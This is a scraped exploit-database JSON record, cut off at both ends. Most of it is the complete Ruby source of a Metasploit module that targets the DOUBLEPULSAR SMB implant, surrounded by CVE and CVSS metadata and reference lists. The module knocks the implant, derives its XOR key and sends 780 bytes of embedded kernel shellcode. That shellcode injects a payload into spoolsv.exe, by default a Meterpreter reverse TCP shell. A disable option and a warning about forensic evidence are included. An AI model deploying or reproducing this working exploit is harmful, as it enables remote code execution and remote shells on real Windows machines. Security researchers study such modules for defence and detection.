"immutableFields": [], "lastseen": "2021-09-28T22:23:32", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-33895", "1337DAY-ID-27752", 
"1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-28T06:16:50", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-28T06:16:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-29] #"}, "lastseen": "2021-09-28T22:23:32", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1aa7ba96ed09ffa60842766511abc9d1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-29T22:25:08", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:42030"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-29702", "1337DAY-ID-27803", "1337DAY-ID-27613", 
"1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706", "SMNTC-96705", "SMNTC-96709"]}, {"type": 